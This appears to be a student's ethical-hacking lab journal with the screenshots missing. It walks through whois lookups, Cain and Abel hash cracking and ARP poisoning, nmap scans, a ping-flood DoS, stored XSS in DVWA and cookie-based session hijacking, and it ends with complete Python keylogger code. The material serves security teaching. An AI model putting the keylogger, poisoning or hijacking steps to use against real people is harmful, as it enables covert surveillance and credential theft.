Professional Documents
Culture Documents
Eh - 754 All Practical
Eh - 754 All Practical
Eh - 754 All Practical
754
Practical No: 01
Case 1 :-
Step 1: Search any random website on the browser, in this case we have
searched for a prestashop.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 6: Official website of who.is and enter the domain about the website,
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 9: After having looked at the information that is available with who.is . one can even
have a look at the DNS record of the searched website.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 10: Once done with a DNS record, one can have a look at the Diagnostic Section. In
which who.is server sends a request to the server of the searched website that is prestashop
server.
Case 2:-
Step 1: Search any random website on the browser, in this case we have
Searched amazon prime video
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 6: Official website of who.is and enter the domain about the website,
whose information we want to know.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 9: After having looked at the information that is available with who.is . one can even
have a look at the DNS record of the searched website.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 10: Once done with a DNS record, one can have a look at the Diagnostic Section. In
which who.is server sends a request to the server of the searched website that is the prime
video server.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 02
Aim : Password Encryption and Cracking with CrypTool and Cain and Abel
A. Use CrypTool to encrypt and decrypt passwords using the RC4 algorithm.
B. Use Cain and Abel for cracking Windows account password using Dictionary
attack and brute force attack.
Procedure :-
A. CrypTool
Step 2: Now, enter plaintext that is to encrypted in order to do so click on File → New.
Step 3: Select algorithm that is to be used for encrypting plaintext. Here in this case we are
making use of a Symmetric encryption algorithm for encrypting plaintext. In order to do so
we need to click on “ Encrypt / Decrypt → Symmetric (modern) → RC4.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 4: Here we need to enter key length and the key that should be used to encrypt plaintext
by using the RC4 algorithm.
Step 5: After clicking on the encrypt button, cipher text of the respective plain text will be
displayed.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 6: Now, once plaintext is encrypted successfully, we need to decrypt ciphertext this can
also be done by the same way as of encrypting plaintext, Encrypt / Decrypt → Symmetric
(modern) → RC4 → Decrypt
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 1: Open Cain and Abel application, then click on Hash Calculator.
Step 2: Below given screen will appear, enter plaintext in respective field and then click on
calculate hash
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
MD5 :- D08AE25CABA6A431331E222D45638061
Step 3: After the MD5 hash value of the given plaintext is generated, preserve it. Now, click
on the “Cracker” tab, there click on “MD5 Hashes”, then click on grid anywhere, after
clicking on grid “Plus” will be enabled where we need to hash a value that is to be decrypted
using a dictionary and brute-force attack.
Step 4: After clicking on “Plus” sign, pop-up will appear where we need to enter MD5 hash
value
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 5: After entering MD5 hash value, click on the “OK” button, MD5 value will appear in
the grid. Right click on MD5 value in order to launch Dictionary attack.
Step 6: After clicking on “Dictionary Attack”, below given screen will appear
Step 7: In order to make a dictionary attack successful, we need to add the respective key in
the “dictionary list” of the software.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 9: After inserting the word list, click on start, after some time respective words will
appear in the output of the dictionary attack. If we don’t enter the key in the word list then the
dictionary attack will not be able to crack MD5 Hash value.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 10: Now, in order to do “Brute-Force attack”, again right click on MD5 value
Step 11: After clicking on “Brute-Force attack”, below the given window will appear, here
just click on “start” button to launch brute-force attack.
Step 12: When we do brute force attack after dictionary attack, then we get output in very
less amount of time but if we do brute-force attack without performing prior dictionary attack
then brute-force attack will take a lot of time to crack the MD5 Hash value
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 03
Part A :-
Step 1: Create Virtual Machine in order to run Ubuntu OS in Host Windows OS.
Command 1: ipconfig
Windows:ipconfig
Ubuntu:ifconfig
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Command 2 :- netstat(Windows)
Ubuntu:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ubuntu:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ubuntu:
Step 1: Open Cain and Abel application. Once the application is launched successfully, click
on “start/stop sniffing” and then click on the “sniffer” tab.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 2: Now, in the sniffer tab click anywhere on the grid in order to enable the “plus” sign,
once it gets enabled click on it, below the given screen will appear.
Step 3: Software will find the IP address and Default Gateway of all devices available on the
network.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 4: Click on “APR” and then anywhere on the grid in order to enable plus sign. Once it
gets enabled click on it.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 5: On the left side we need to select the default Gateway and on the right side we need
to select the IP address of the target machine
Step 6: After specifying IP address and Default Gateway of the target machine, click on
“start/stop APR”, it will start poisoning the network of the target machine and will capture all
the data that are sent from the respective target machine
Step 7: The PC who's IP address is entered for poisoning, from that system the user will have
to login to any not secure login page for example: http://testphp.vulnweb.com/login.php and
enter login credentials and try logging in.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 8: After poisoning the network of the target machine, we need to go to the password tab
which is present at the bottom and from there on the “HTTP” tab as requests are sent via http
protocol
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 04
1. ACK : ACK scan is enabled by specifying the -sA option.Its probe packet has only the
ACK flag set(unless you use -scanflags).
nmap -sA -T4 scanme.nmap.org
Windows:
Nmap:
2. SYN: short for synchromize.SYN is a TCP packet sent to another computer requesting
that a connection be established between them.
nmap -p22,113,139 scanme.nmap.org
Windows:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Nmap:
3. FIN:The standard use of a FIN packet is to terminate the TCP connection-typically after
the data transfer is complete.
nmap -sF -T4 scanme.nmap.org
Windows:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Nmap:
4. NULL : Nmap exploits this with three scan types: Null scan(-sN) does not set any bit (TCP
flag header is 0) FIn scan(-sF) sets just the TCP FIN bit...(incomplete h)
nmap -sN -p22 scanme.nmap.org
Windows:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Nmap:
5. XMAS: Xmas scan (-sX) Sets the FIN , PSH, and URG flags, lighting the packet
Christmass Tree
nmap -sX -T4 scanme.nmap.org
Windows:
Nmap:
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 05
Aim: Network Traffic Capture and DoS Attack with Wireshark and Nemesy.
A. Network Traffic Capture:
1. Use Wireshark to capture network traffic on a specific network interface.
2. Analyze the captured packets to extract relevant information and identify
potential security issues.
B. Denial of Service (DoS) Attack:
1. Use Nemesy to launch a DoS attack against a target system or network.
2. Observe the impact of the attack on the target's availability and
performance.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 2: Go to any website that is not secure and try logging in.
http://testphp.vulnweb.com/login.php
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 2: Find the ip address of the victim system and put the following command in cmd.
Command: ping 192.168.2.43 -t-100
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 06
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 6: Start xampp server (Apache and MySql) and in browser open
http://localhost/DVWA/ On any web browser
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 7: Once loaded, the below given page will be displayed. → Click on Setup/ Reset
Database.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 8: Scroll Down the page and Click on “Create/ Reset Database”
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 9: The below fields should be displayed after clicking the button.
Step 10: Logout and then Login with Username and Password.
Username :- admin
Password:- password
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 11: Set the DVWA security level in DVMA security tab to low, after selecting security
level click on submit in order to change security level.
Step 12: Click on XSS (Stored) → Fill the Name and write script code in Message as
Follows:
<script>{alert(“Performed by 754_durgesh ”)}</script>
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 08
Step 1: Install and open Firefox browser → Go to Add-ons and search Tamper.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 5: Click on Cookie editor Add-on on top right corner. Copy this session id.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 7: go to add on select Tamper /Run extension and Start tamper data -> Click yes.
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Step 9: In index.php page Paste the copied session id in cookie and click ok
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Practical No: 09
Step 1: Go to the path where your Python file is located and open cmd in the Scripts Folder.
Install the required library.
Pip install pynput
Step 2: Create a new file in IDLE and enter the following code.
Input:
from pynput.keyboard import Key,Listener
import logging
log_dir = "C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python311\\
p9.pyw"
logging.basicConfig(filename=(log_dir+"keylogger123.txt"),level=logging.DEBUG,format='
%(asctime)s%(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
Ethical hacking
TYBSc CS SEM VI ROLL NO. 754
Output:
Ethical hacking